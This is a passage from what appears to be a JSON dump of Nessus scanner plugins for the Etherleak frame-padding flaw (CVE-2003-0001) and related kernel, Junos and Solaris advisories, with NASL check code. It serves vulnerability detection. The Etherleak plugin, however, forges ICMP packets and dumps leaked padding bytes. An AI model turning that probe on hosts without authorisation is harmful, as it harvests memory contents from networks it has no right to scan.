flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:09:10", "references": ["http://www.nessus.org/u?719c90b4"], "pluginID": "11197", "description": "The remote host uses a network device driver that pads ethernet frames with data which vary from one packet to another, likely taken from kernel memory, system memory allocated to the device driver, or a hardware buffer on its network interface card.\n\nKnown as 'Etherleak', this information disclosure vulnerability may allow an attacker to collect sensitive information from the affected host provided he is on the same physical subnet as that host.", "edition": 4, "reporter": "Tenable", "published": "2003-01-14T00:00:00", "title": "Multiple Ethernet Driver Frame Padding Information Disclosure (Etherleak)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Misc.", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2018-07-10T00:00:00", "cpe": [], "id": "ETHERLEAK.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11197", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11197);\n script_version(\"1.29\");\n script_cvs_date(\"Date: 2018/07/10 14:27:33\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_bugtraq_id(6535);\n\n script_name(english:\"Multiple Ethernet Driver Frame Padding Information Disclosure (Etherleak)\");\n script_summary(english:\"etherleak check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host appears to leak memory in network packets.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host uses a network device driver that pads ethernet frames\nwith data which vary from one packet to another, likely taken from\nkernel memory, system memory allocated to the device driver, or a\nhardware buffer on its network interface card.\n\nKnown as 'Etherleak', this information disclosure vulnerability may\nallow an attacker to collect sensitive information from the affected\nhost provided he is on the same physical subnet as that host.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?719c90b4\");\n script_set_attribute(attribute:\"solution\", value:\"Contact the network device driver's vendor for a fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Misc.\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"dump.inc\");\ninclude(\"global_settings.inc\");\n\nif ( ! islocalnet() ) exit(0, \"The target must be on the same local subnet as the Nessus server.\");\nif ( TARGET_IS_IPV6 ) exit(0, \"Can't test over IPv6.\");\n\nfunction probe()\n{\n local_var filter, i, icmp, ip, len, rep, str;\n\n ip = forge_ip_packet(ip_p:IPPROTO_ICMP, ip_src:this_host());\n icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0, icmp_seq:1, icmp_id:1, data:\"x\");\n\n filter = string(\"icmp and src host \", get_host_ip(), \" and dst host \", this_host());\n\n for(i=0;i<3;i++)\n {\n rep = send_packet(icmp, pcap_filter:filter);\n if(rep)break;\n }\n\n if(rep == NULL)exit(0);\n##dump(dtitle: \"ICMP\", ddata: rep);\n\n len = get_ip_element(ip:rep, element:\"ip_len\");\n if(strlen(rep) > len)\n {\n str=\"\";\n for(i=len;i<strlen(rep);i++)\n {\n str = string(str, rep[i]);\n }\n return(str);\n }\n else return(NULL);\n}\n\nfunction ping()\n{\n local_var filter, i, icmp, ip, rep;\n\n ip = forge_ip_packet(ip_p:IPPROTO_ICMP, ip_src:this_host());\n icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0, icmp_seq:1, icmp_id:1, data:crap(data:\"nessus\", length:254));\n\n filter = string(\"icmp and src host \", get_host_ip(), \" and dst host \", this_host());\n\n for(i=0;i<3;i++) rep = send_packet(icmp, pcap_filter:filter, pcap_timeout:1);\n}\n\nif(islocalhost())exit(0, \"Can't test localhost.\");\n\n\nstr1 = probe();\nping();\nsleep(1);\nstr2 = probe();\n\n##dump(dtitle: \"ether1\", ddata: str1);\n##dump(dtitle: \"ether2\", ddata: str2);\n\nif (isnull(str1) || isnull(str2)) exit(0, \"There was no padding in one or both packets.\");\n\nif (str1 != str2)\n{\n str1_0 = str_replace(find:raw_string(0x00), replace:\"\", string:str1);\n str2_0 = str_replace(find:raw_string(0x00), replace:\"\", string:str2);\n if (strlen(str1_0) == 0 && strlen(str2_0) == 0) exit(0, \"The padding in both packets consists of all NULLs.\");\n\n if (report_verbosity > 0)\n {\n report = '\\n' + 'Padding observed in one frame :' +\n '\\n' +\n '\\n' + ' ' + str_replace(find:'\\n', replace:'\\n ', string:hexdump(ddata:str1)) +\n '\\n' + 'Padding observed in another frame :' +\n '\\n' +\n '\\n' + ' ' + str_replace(find:'\\n', replace:'\\n ', string:hexdump(ddata:str2));\n report = chomp(report) + '\\n';\n security_note(proto:\"icmp\", port:0, extra:report);\n }\n else security_note(proto:\"icmp\", port:0);\n\n set_kb_item(name:\"Host/etherleak\", value:TRUE);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-19T14:06:09", "references": ["https://lkml.org/lkml/2002/4/27/101", "https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10579", "http://blog.spoofed.org/2007/03/etherleak-old-dog-old-tricks.html"], "pluginID": "68912", "description": "According to its self-reported version number, the remote Junos device has an information disclosure vulnerability. SRX1400, SRX3400, and SRX3600 services gateways pad Ethernet packets with data from previous packets instead of padding them with null bytes. A remote, unauthenticated attacker could exploit this to gain access to sensitive information, which could be used to mount further attacks.", "edition": 8, "reporter": "Tenable", "published": "2013-07-16T00:00:00", "title": "Juniper Junos SRX1400/3400/3600 Etherleak Information Disclosure (JSA10579)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Junos Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001", "CVE-2013-4690"], "modified": "2018-09-17T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_JSA10579.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68912", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68912);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_cve_id(\n \"CVE-2003-0001\", # generic etherleak vulnerability\n \"CVE-2013-4690\" # etherleak in junos\n );\n script_bugtraq_id(\n 6535, # generic etherleak vulnerability\n 61123 # etherleak in junos\n );\n script_xref(name:\"CERT\", value:\"412115\");\n\n script_name(english:\"Juniper Junos SRX1400/3400/3600 Etherleak Information Disclosure (JSA10579)\");\n script_summary(english:\"Checks version, model, and build date\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its self-reported version number, the remote Junos device\nhas an information disclosure vulnerability. SRX1400, SRX3400, and\nSRX3600 services gateways pad Ethernet packets with data from previous\npackets instead of padding them with null bytes. A remote,\nunauthenticated attacker could exploit this to gain access to sensitive\ninformation, which could be used to mount further attacks.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://lkml.org/lkml/2002/4/27/101\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.spoofed.org/2007/03/etherleak-old-dog-old-tricks.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10579\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the relevant Junos upgrade referenced in Juniper advisory\nJSA10579.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/04/27\"); # disclosed on LKML\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/model\", \"Host/Juniper/JUNOS/Version\", \"Host/Juniper/JUNOS/BuildDate\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"junos.inc\");\ninclude(\"misc_func.inc\");\n\nmodel = get_kb_item_or_exit('Host/Juniper/model');\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\nbuild_date = get_kb_item_or_exit('Host/Juniper/JUNOS/BuildDate');\n\nif (model != 'SRX1400' && model != 'SRX3400' && model != 'SRX3600')\n audit(AUDIT_HOST_NOT, 'SRX1400/3400/3600');\nif (compare_build_dates(build_date, '2013-06-20') >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, 'Junos', ver + ' (build date ' + build_date + ')');\nif (ver == '11.4R7-S1' || ver == '12.1R5-S3')\n audit(AUDIT_INST_VER_NOT_VULN, 'Junos', ver);\n\nfixes['10.4'] = '10.4S13';\nfixes['11.4'] = '11.4R8';\nfixes['12.1'] = '12.1R7';\nfixes['12.1X44'] = '12.1X44-D20';\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\n\nif (report_verbosity > 0)\n{\n report = get_report(ver:ver, fix:fix, model:model);\n security_warning(port:0, extra:report);\n}\nelse security_warning(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-15T07:07:08", "references": ["http://www.nessus.org/u?8b92ae0e", "https://support.oracle.com/epmos/faces/DocumentDisplay?id=1956176.1", "http://www.nessus.org/u?75c6cafb"], "pluginID": "80936", "description": "This Solaris system is missing necessary patches to address critical security updates :\n\n - Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: AMD pcnet driver).\n Supported versions that are affected are 10 and 11.\n Easily exploitable vulnerability allows successful unauthenticated network attacks via TCP/IP. Successful attack of this vulnerability can result in unauthorized read access to a subset of Solaris accessible data.\n (CVE-2003-0001)\n\n - Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: RPC Utility).\n Supported versions that are affected are 10 and 11.\n Difficult to exploit vulnerability requiring logon to Operating System. Successful attack of this vulnerability can result in unauthorized update, insert or delete access to some Solaris accessible data and ability to cause a partial denial of service (partial DOS) of Solaris. (CVE-2015-0429)\n\n - Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: RPC Utility).\n Supported versions that are affected are 10 and 11.\n Difficult to exploit vulnerability requiring logon to Operating System. Successful attack of this vulnerability can result in unauthorized read access to a subset of Solaris accessible data. (CVE-2015-0430)", "edition": 7, "reporter": "Tenable", "published": "2015-01-23T00:00:00", "title": "Oracle Solaris Critical Patch Update : jan2015_SRU11_1_11_4_0", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001", "CVE-2015-0430", "CVE-2015-0429"], "modified": "2018-11-14T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.1"], "id": "SOLARIS_JAN2015_SRU11_1_11_4_0.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80936", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle CPU for jan2015.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80936);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/14 14:36:23\");\n\n script_cve_id(\"CVE-2003-0001\", \"CVE-2015-0429\", \"CVE-2015-0430\");\n script_bugtraq_id(6535, 72133, 72141);\n\n script_name(english:\"Oracle Solaris Critical Patch Update : jan2015_SRU11_1_11_4_0\");\n script_summary(english:\"Check for the jan2015 CPU\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch from CPU\njan2015.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This Solaris system is missing necessary patches to address critical\nsecurity updates :\n\n - Vulnerability in the Solaris component of Oracle Sun\n Systems Products Suite (subcomponent: AMD pcnet driver).\n Supported versions that are affected are 10 and 11.\n Easily exploitable vulnerability allows successful\n unauthenticated network attacks via TCP/IP. Successful\n attack of this vulnerability can result in unauthorized\n read access to a subset of Solaris accessible data.\n (CVE-2003-0001)\n\n - Vulnerability in the Solaris component of Oracle Sun\n Systems Products Suite (subcomponent: RPC Utility).\n Supported versions that are affected are 10 and 11.\n Difficult to exploit vulnerability requiring logon to\n Operating System. Successful attack of this\n vulnerability can result in unauthorized update, insert\n or delete access to some Solaris accessible data and\n ability to cause a partial denial of service (partial\n DOS) of Solaris. (CVE-2015-0429)\n\n - Vulnerability in the Solaris component of Oracle Sun\n Systems Products Suite (subcomponent: RPC Utility).\n Supported versions that are affected are 10 and 11.\n Difficult to exploit vulnerability requiring logon to\n Operating System. Successful attack of this\n vulnerability can result in unauthorized read access to\n a subset of Solaris accessible data. (CVE-2015-0430)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.oracle.com/epmos/faces/DocumentDisplay?id=1956176.1\"\n );\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/2367957.xml\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8b92ae0e\"\n );\n # https://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75c6cafb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the jan2015 CPU from the Oracle support website.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\n\n\nfix_release = \"0.5.11-0.175.1.11.0.4.0\";\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.1.11.0.4.0\", sru:\"11.1.11.4.0\") > 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:solaris_get_report2());\n else security_warning(0);\n exit(0);\n}\naudit(AUDIT_OS_RELEASE_NOT, \"Solaris\", fix_release, release);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:39:25", "references": [], "pluginID": "14023", "description": "A number of vulnerabilities have been found in the Linux 2.2 kernel that have been addressed with the latest 2.2.25 release.\n\nA bug in the kernel module loader code could allow a local user to gain root privileges. This is done by a local user using ptrace and attaching to a modprobe process that is spawned if the user triggers the loading of a kernel module.\n\nA temporary workaround can be used to defend against this flaw. It is possible to temporarily disable the kmod kernel module loading subsystem in the kernel after all of the required kernel modules have been loaded. Be sure that you do not need to load additional kernel modules after implementing this workaround. To use it, as root execute :\n\necho /no/such/file >/proc/sys/kernel/modprobe\n\nTo automate this, you may wish to add it as the last line of the /etc/rc.d/rc.local file. You can revert this change by replacing the content '/sbin/modprobe' in the /proc/sys/kernel/modprobe file. The root user can still manually load kernel modules with this workaround in place.\n\nAs well, multiple ethernet device drivers do not pad frames with null bytes, which could allow remote attackers to obtain information from previous packets or kernel memory by using malformed packets.\n\nFinally, the 2.2 kernel allows local users to cause a crash of the host system by using the mmap() function with a PROT_READ parameter to access non-readable memory pages through the /proc/pid/mem interface.\n\nAll users are encouraged to upgrade to the latest kernel version provided.\n\nFor instructions on how to upgrade your kernel in Mandrake Linux, please refer to :\n\nhttp://www.mandrakesecure.net/en/kernelupdate.php", "edition": 5, "reporter": "Tenable", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : kernel22 (MDKSA-2003:039)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0127", "CVE-2003-0001", "CVE-2002-1380"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:kernel-pcmcia-cs", "cpe:/o:mandrakesoft:mandrake_linux:7.2", "p-cpe:/a:mandriva:linux:kernel22-smp", "p-cpe:/a:mandriva:linux:alsa", "p-cpe:/a:mandriva:linux:kernel22", "cpe:/o:mandrakesoft:mandrake_linux:8.2", "p-cpe:/a:mandriva:linux:kernel22-source", "p-cpe:/a:mandriva:linux:alsa-source", "p-cpe:/a:mandriva:linux:reiserfs-utils", "p-cpe:/a:mandriva:linux:kernel", "p-cpe:/a:mandriva:linux:kernel-source", "cpe:/o:mandrakesoft:mandrake_linux:8.1", "p-cpe:/a:mandriva:linux:kernel-secure", "p-cpe:/a:mandriva:linux:kernel-utils", "p-cpe:/a:mandriva:linux:kernel-headers", "p-cpe:/a:mandriva:linux:kernel-doc", "p-cpe:/a:mandriva:linux:kernel-smp"], "id": "MANDRAKE_MDKSA-2003-039.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14023", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:039. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14023);\n script_version (\"1.18\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_cve_id(\"CVE-2002-1380\", \"CVE-2003-0001\", \"CVE-2003-0127\");\n script_xref(name:\"MDKSA\", value:\"2003:039\");\n\n script_name(english:\"Mandrake Linux Security Advisory : kernel22 (MDKSA-2003:039)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of vulnerabilities have been found in the Linux 2.2 kernel\nthat have been addressed with the latest 2.2.25 release.\n\nA bug in the kernel module loader code could allow a local user to\ngain root privileges. This is done by a local user using ptrace and\nattaching to a modprobe process that is spawned if the user triggers\nthe loading of a kernel module.\n\nA temporary workaround can be used to defend against this flaw. It is\npossible to temporarily disable the kmod kernel module loading\nsubsystem in the kernel after all of the required kernel modules have\nbeen loaded. Be sure that you do not need to load additional kernel\nmodules after implementing this workaround. To use it, as root \nexecute :\n\necho /no/such/file >/proc/sys/kernel/modprobe\n\nTo automate this, you may wish to add it as the last line of the\n/etc/rc.d/rc.local file. You can revert this change by replacing the\ncontent '/sbin/modprobe' in the /proc/sys/kernel/modprobe file. The\nroot user can still manually load kernel modules with this workaround\nin place.\n\nAs well, multiple ethernet device drivers do not pad frames with null\nbytes, which could allow remote attackers to obtain information from\nprevious packets or kernel memory by using malformed packets.\n\nFinally, the 2.2 kernel allows local users to cause a crash of the\nhost system by using the mmap() function with a PROT_READ parameter to\naccess non-readable memory pages through the /proc/pid/mem interface.\n\nAll users are encouraged to upgrade to the latest kernel version\nprovided.\n\nFor instructions on how to upgrade your kernel in Mandrake Linux,\nplease refer to :\n\nhttp://www.mandrakesecure.net/en/kernelupdate.php\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:alsa-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-pcmcia-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-secure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel22-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel22-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:reiserfs-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"alsa-2.2.25_0.5.11-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"alsa-source-2.2.25_0.5.11-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-doc-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-headers-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-pcmcia-cs-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-secure-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-smp-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-source-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"kernel-utils-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.2\", cpu:\"i386\", reference:\"reiserfs-utils-2.2.25_3.5.29-1.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"kernel22-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"kernel22-smp-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"kernel22-source-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"kernel22-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"kernel22-smp-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"kernel22-source-2.2.25-1.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-17T02:54:06", "references": ["https://marc.info/?l=bugtraq&m=105664924024009&w=2"], "pluginID": "14049", "description": "Multiple vulnerabilities were discovered and fixed in the Linux kernel.\n\n - CVE-2003-0001: Multiple ethernet network card drivers do not pad frames with null bytes which allows remote attackers to obtain information from previous packets or kernel memory by using special malformed packets.\n\n - CVE-2003-0244: The route cache implementation in the 2.4 kernel and the Netfilter IP conntrack module allows remote attackers to cause a Denial of Service (DoS) via CPU consumption due to packets with forged source addresses that cause a large number of hash table collisions related to the PREROUTING chain.\n\n - CVE-2003-0246: The ioperm implementation in 2.4.20 and earlier kernels does not properly restrict privileges, which allows local users to gain read or write access to certain I/O ports.\n\n - CVE-2003-0247: A vulnerability in the TTY layer of the 2.4 kernel allows attackers to cause a kernel oops resulting in a DoS.\n\n - CVE-2003-0248: The mxcsr code in the 2.4 kernel allows attackers to modify CPU state registers via a malformed address.\n\n - CVE-2003-0462: A file read race existed in the execve() system call.\n\nAs well, a number of bug fixes were made in the 9.1 kernel including :\n\n - Support for more machines that did not work with APIC\n\n - Audigy2 support\n\n - New/updated modules: prims25, adiusbadsl, thinkpad, ieee1394, orinoco, via-rhine,\n\n - Fixed SiS IOAPIC\n\n - IRQ balancing has been fixed for SMP\n\n - Updates to ext3\n\n - The previous ptrace fix has been redone to work better\n\n - Bugs with compiling kernels using xconfig have been fixed\n\n - Problems with ipsec have been corrected\n\n - XFS ACLs are now present\n\n - gdb not working on XFS root filesystems has been fixed\n\nMandrakeSoft encourages all users to upgrade to these new kernels.\nUpdated kernels will be available shortly for other supported platforms and architectures.\n\nFor full instructions on how to properly upgrade your kernel, please review 